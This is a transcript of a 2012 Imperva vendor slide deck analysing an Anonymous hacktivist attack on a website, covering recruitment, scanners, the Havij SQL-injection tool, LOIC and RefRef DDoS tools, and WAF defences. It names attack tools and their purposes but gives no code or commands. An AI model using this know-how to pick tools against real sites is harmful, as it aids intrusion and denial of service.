Presentation is loading. Please wait.

Presentation is loading. Please wait.

Anatomy of an Web Application Attack

Published byMorris Thornton Modified over 9 years ago

Similar presentations

Presentation on theme: "Anatomy of an Web Application Attack"— Presentation transcript:

1 Anatomy of an Web Application Attack
June 2012 Terry Ray – VP WW Security Engineering

2 About Imperva – The Leader in Data Security
Imperva protects data and Internet transactions from malicious insiders and external threats. Database Security Audit database access and deliver real-time protection against database attacks About Imperva Founded 2002 by Shlomo Kramer More than 1700 Enterprise customers across: Federal, state, and local government agencies Hundreds of small and medium sized businesses Non-profits and academic institutions. More than 25,500 organizations across 40 countries protected by Imperva. “Imperva is helping us protect the security and privacy of customer data, and gain unprecedented visibility into who is accessing this critical operational system.” Web Application Security Protection against large scale Web attacks with reputation controls, automated management and drop-in deployment File Security Auditing, protection and rights management for unstructured data - CONFIDENTIAL -

3 The Plot Attack took place in 2011 over a 25 day period.
Anonymous was on a deadline to breach and disrupt a website; a proactive attempt at hacktivism. 10-15 skilled hackers. Several hundred to thousands supporters.

4 On the Defense Deployment line was a network firewall, IDS, WAF, web servers, network anti-DOS and anti-virus. Imperva WAF SecureSphere WAF version 8.5 inline, high availability ThreatRadar reputation (IP Reputation) SSL wasn’t used, the whole website was in HTTP

5 1 Recruiting and Communications

6 An “Inspirational” Video & Social Communication

7 Setting Up An Early Warning System

8 2 Recon and Application Attack
“Avoid strength, attack weakness: Striking where the enemy is most vulnerable.” —Sun Tzu

9 Step 1A: Finding Vulnerabilities
Tool #1: Vulnerability Scanners Purpose: Rapidly find application vulnerabilities. Cost: $0-$1000 per license. The specific tools: Acunetix (named a “Visionary” in a Gartner 2011 MQ) Nikto (open source)

10 Hacking Tools Tool #2: Havij Purpose: Developed in Iran
Automated SQL injection and data harvesting tool. Solely developed to take data transacted by applications Developed in Iran

11 Vulnerabilities of Interest
DT SQLi XSS

12 US is the ‘visible’ source of most attacks
Additionally, the ADC found that 29 percent of the attack events originated from the 10 most active attack sources. While filtering based on geography is far from reliable, sorting traffic based on reputation is viable. Even though the identity of the host that initiated an attack is not necessarily indicative of the identity of the attacker that controls it, we have investigated the geographic distribution of the attack-initiating hosts as determined by their IP addresses.For all attack types the attackers were spread around the world but most of the attacks (both in absolute numbers and counting the distinct hosts initiating the attacks) were from the United States. A significant portion of SQL Injection attacks we observed coming from a relatively small number of Chinese hosts (see Figure 3). The leading source countries were rather consistent across all attack types. The average ratio of attacks to attacking hosts is about 10:1 for RFI, 25:1 for SQL injection and 40:1 for DT. During the Anonymous attack 74% of the technical attack traffic originated from anonymizing services and was detected by IP reputation.

13 Comparing to Lulzsec Activity
Lulzsec was/is a team of hackers focused on breaking applications and databases. ‘New’ Lulzsec taking credit for recent attacks. Militarysingles.com. Our observations have a striking similarity to the attacks employed by Lulzsec during their campaign. Lulzsec used: SQL Injection, Cross-site Scripting and Remote File Inclusion (RFI/LFI). RFI index.php Additionally, the ADC found that 29 percent of the attack events originated from the 10 most active attack sources. While filtering based on geography is far from reliable, sorting traffic based on reputation is viable. Even though the identity of the host that initiated an attack is not necessarily indicative of the identity of the attacker that controls it, we have investigated the geographic distribution of the attack-initiating hosts as determined by their IP addresses.For all attack types the attackers were spread around the world but most of the attacks (both in absolute numbers and counting the distinct hosts initiating the attacks) were from the United States. A significant portion of SQL Injection attacks we observed coming from a relatively small number of Chinese hosts (see Figure 3). The leading source countries were rather consistent across all attack types. The average ratio of attacks to attacking hosts is about 10:1 for RFI, 25:1 for SQL injection and 40:1 for DT.

14 Lulzsec Activity Samples
1 infected server ≈ 3000 bot infected PC power 8000 infected servers ≈ 24 million bot infected PC power Additionally, the ADC found that 29 percent of the attack events originated from the 10 most active attack sources. While filtering based on geography is far from reliable, sorting traffic based on reputation is viable. Even though the identity of the host that initiated an attack is not necessarily indicative of the identity of the attacker that controls it, we have investigated the geographic distribution of the attack-initiating hosts as determined by their IP addresses.For all attack types the attackers were spread around the world but most of the attacks (both in absolute numbers and counting the distinct hosts initiating the attacks) were from the United States. A significant portion of SQL Injection attacks we observed coming from a relatively small number of Chinese hosts (see Figure 3). The leading source countries were rather consistent across all attack types. The average ratio of attacks to attacking hosts is about 10:1 for RFI, 25:1 for SQL injection and 40:1 for DT.

15 Automation is Prevailing
In one hacker forum, one hacker claimed to have found 5012 websites vulnerable to SQLi through automation tools. Note: Due to automation, hackers can be effective in small groups – i.e. Lulzsec, Anti-Sec, OpIndia, etc Automation also means that attacks are equal opportunity offenders. They don’t discriminate between well-known and unknown sites or agencies. They don’t need ‘skillz’ to steal data or DDOS. Most notably, the ADC found that attack automation is prevailing. Modern botnets scan and probe the Web seeking to exploit vulnerabilities and extract valuable data, conduct brute force password attacks, disseminate spam, distribute malware, and manipulate search engine results. These botnets operate with the same comprehensiveness and efficiency used by Google spiders to index websites. As the recent Lulzsec episode highlighted, hackers can be effective in small groups. Further, automation also means that attacks are equal opportunity offenders; they do not discriminate between well-known and unknown sites or enterprise-level and non-profit organizations. Automation is prevailing. According to the study, websites experience an average of 27 attacks per hour or about once every two minutes. However, 27 attacks per hour is only an average. When sites come under automated attack, the target can experience up to 25,000 attacks per hour or 7 per second.

16 Stop Automated Attacks
Mitigation: AppSec 101 Code Fixing Dork Yourself Blacklist + IP Rep WAF + Mitb WAF + VA Stop Automated Attacks

17 3 Application DDoS

18 LOIC Facts Low-Orbit Ion Canon (LOIC) Purpose:
DDoS Mobile and Javascript variations Other variations – HOIC, GOIC, RefRef LOIC downloads 2011: 381,976 2012 (through May 10): 374,340 June 2012= ~98% of 2011’s downloads!

19 Anonymous and LOIC in Action
Transactions per Second LOIC in Action Average Site Traffic

20 Application DDoS The effectiveness of RefRef is due to the fact that it exploits a vulnerability in a widespread SQL service. The flaw is apparently known but not widely patched yet. The tool's creators don't expect their attacks to work on a high-profile target more than a couple of times before being blocked, but they don't believe organizations will rush to patch this flaw en masse before being hit. —The Hacker News, July 30, 2011

21 4 Non-Mitigations

22 I have IPS and NGFW, am I safe?
IPS and NGFWs do not prevent web application attacks. Don’t confuse “application aware marketing” with Web Application Security. WAFs at a minimum must include the following to protect web applications: Web-App Profile Web-App Signatures Web-App Protocol Security Web-App DDOS Security Web-App Cookie Protection Anonymous Proxy/TOR IP Security HTTPS (SSL) visibility Security Policy Correlation

23 I have IPS and NGFW, am I safe?
IPS and NGFWs do not prevent web application attacks. Don’t confuse “application aware marketing” with Web Application Security. However, IPS and NGFWs at best only partially support the items in Red: Web-App Profile Web-App Signatures Web-App Protocol Security Web-App DDOS Security Web-App Cookie Protection Anonymous Proxy/TOR IP Security HTTPS (SSL) visibility Security Policy Correlation

24 Recent attacker targets….
US Department of Justice US Copyright Office FBI MPAA Warner Brothers RIAA HADOPI BMI SOHH Office of the AU Prime Minister AU House of Parliament AU Department of Communications Swiss bank PostFinance Fine Gael New Zealand Parliament Tunisia Government Zimbabwe Government Egyptian Government Itau Banco de Brazil US Senate Caixa Church of Scientology Muslim Brotherhood Zappos.com MilitarySingles.com Amazon Austria Federal Chancellor HBGary Federal Mexican Interior Ministry Mexican Senate Mexican Chamber of Deputies Irish Department of Justice Irish Department of Finance Greek Department of Justice Egyptian National Democratic Party Spanish Police Orlando Chamber of Commerce Catholic Diocese of Orlando Bay Area Rapid Transit PayPal Mastercard Visa How many of these organizations have AV, IPS and Next Generations Firewalls? Why are the attacks successful when these technologies claim to prevent them?

25 5 Demo

Download ppt "Anatomy of an Web Application Attack"

Similar presentations

ETHICAL HACKING A LICENCE TO HACK

ETHICAL HACKING A LICENCE TO HACK
Palo Alto Networks Jay Flanyak Channel Business Manager

Palo Alto Networks Jay Flanyak Channel Business Manager
Hands-on SQL Injection Attack and Defense HI-TEC July 21, 2013.

Hands-on SQL Injection Attack and Defense HI-TEC July 21, 2013.
New Solutions to New Threats. The Threats, They Are A Changing Page 2 | © 2008 Palo Alto Networks. Proprietary and Confidential.

New Solutions to New Threats. The Threats, They Are A Changing Page 2 | © 2008 Palo Alto Networks. Proprietary and Confidential.
George Tubin Senior Analyst Consumer Banking © 2005 The Tower Group, Inc. May not be reproduced by any means without express permission. All rights reserved.

George Tubin Senior Analyst Consumer Banking © 2005 The Tower Group, Inc. May not be reproduced by any means without express permission. All rights reserved.
© 2015 Imperva, Inc. All rights reserved. Collateral DDoS Ido Leibovich, ADC.

© 2015 Imperva, Inc. All rights reserved. Collateral DDoS Ido Leibovich, ADC.
Security and Trust in E- Commerce. The E-commerce Security Environment: The Scope of the Problem  Overall size of cybercrime unclear; amount of losses.

Security and Trust in E- Commerce. The E-commerce Security Environment: The Scope of the Problem  Overall size of cybercrime unclear; amount of losses.
CHAPTER 2 KNOW YOUR VILLAINS. Who writes it: Malware writers vary in age, income level, location, social/peer interaction, education level, likes, dislikes.

CHAPTER 2 KNOW YOUR VILLAINS. Who writes it: Malware writers vary in age, income level, location, social/peer interaction, education level, likes, dislikes.
Information Security Overview in the Israeli E-Government April 2010 Ministry of Finance – Accountant General E-government Division.

Information Security Overview in the Israeli E-Government April 2010 Ministry of Finance – Accountant General E-government Division.
Radware DoS / DDoS Attack Mitigation System Orly Sorokin January 2013.

Radware DoS / DDoS Attack Mitigation System Orly Sorokin January 2013.
The Way to Protect The Smartest Way to Protect Websites and Web Apps from Attacks.

The Way to Protect The Smartest Way to Protect Websites and Web Apps from Attacks.
© 2013 Imperva, Inc. All rights reserved. DDos Attacks and Web Threats: How to Protect Your Site & Information Tina Shaw Account Executive 650-832-6087.

© 2013 Imperva, Inc. All rights reserved. DDos Attacks and Web Threats: How to Protect Your Site & Information Tina Shaw Account Executive
The Anatomy and Security of an Anonymous Operation

The Anatomy and Security of an Anonymous Operation
Blended Threats and Layered Defenses Security Protection in Today’s Environment Marshall Taylor

Blended Threats and Layered Defenses Security Protection in Today’s Environment Marshall Taylor
Barracuda Web Application Firewall

Barracuda Web Application Firewall
Client/Server Computing Model of computing in which very powerful personal computers (clients) are connected in a network with one or more server computers.

Client/Server Computing Model of computing in which very powerful personal computers (clients) are connected in a network with one or more server computers.
Spotting Web Vulnerabilities (from the eyes of an Script Kiddie)

Spotting Web Vulnerabilities (from the eyes of an Script Kiddie)
1 Project Part II Double Deuce Jibran Ilyas, Frank LaSota, Paul Lowder, Juan Mendez.

1 Project Part II Double Deuce Jibran Ilyas, Frank LaSota, Paul Lowder, Juan Mendez.
Know the Client Own the Problem Share the Solution The 2005 Case for Information Technology Security October 14, 2004.

Know the Client Own the Problem Share the Solution The 2005 Case for Information Technology Security October 14, 2004.
Browser Exploitation Framework (BeEF) Lab

Browser Exploitation Framework (BeEF) Lab

Similar presentations

Ads by Google